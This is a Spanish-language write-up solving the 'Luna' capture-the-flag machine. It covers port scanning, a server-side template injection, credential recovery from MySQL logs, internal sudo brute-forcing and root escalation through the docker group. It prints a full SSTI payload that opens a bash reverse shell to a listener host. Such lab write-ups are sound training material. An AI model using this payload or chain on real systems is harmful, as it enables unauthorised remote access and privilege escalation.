Write-ups

Resolución de la máquina LUNA

💢Plataforma: heHackersLabs💢

❌Nombre: Luna
📈Nivel: Avanzado
💻OS: LINUX
🙋🏽‍♂️Creador: @r0dgar

Enumeración

Escaneo de puertos

Realizamos un escaneo de todos los puertos para saber cuáles están activos.

Los parámetros utilizados son:

  • -p- : Escaneo de todos los puertos. (65535)
  • -sS : Realiza un TCP SYN Scan para escanear de manera rápida que puertos están abiertos.
  • -sC : Realiz una escaneo con los scripts basicos de reconocimiento
  • -sV : Realiza un escaneo en buqueda de los servicios
  • –min-rate 5000: Especificamos que el escaneo de puertos no vaya más lento que 5000 paquetes por segundo, el parámetro anterior y este hacen que el escaneo se demore menos.
  • -n: No realiza resolución de DNS, evitamos que el escaneo dure más tiempo del necesario.
  • -Pn: Deshabilitamos el descubrimiento de host mediante ping.

Nos encontramos ante una web

La cual haciendo pruebas vemos que es vulnerable a Server Side Template Injection(SSTI), pero no sin antes habilitar la escritura en el imput.

Una vez que sabemos que es vulnerable, encontramos un payload en PayloadAllTheThings para obtener un revshell.

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/192.168.18.149/9001 0>&1"').read() }}

Vemos que esta corriedno un mysql

Y vemos que tenemos los logs de mysql, entre los que encontramos las credenciales.

ASi que entramos y obtenemos las credenciales de juan.

Pero la contraseña esta encodeada en base65, la decodeamos..

Navegando por los directorios nos encontramos un diccionario, pero como tenemos ssh deshabilitado podemos usar scripts de fuerza bruta internos.

Al ser pocos usuarios nos podemos permitir usar el siguiente script en bash para hacer fuerza rbuta interan

https://github.com/Maalfer/Sudo_BruteForce

Encontramos la contraseña del usuario Jose

una vez dentro vemos que pertenece al grupo docker.

En Gtfobins vemos que podemos montar un contenedor temporal con permisos de root.

ASi que dentro del contenedor le damos permisos a la bash como root, salimos y la ejecutamos para ser root.

Especial agradecimiento al compañero R0dgar por la creación y el conocimiento aportado en esta máquina.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *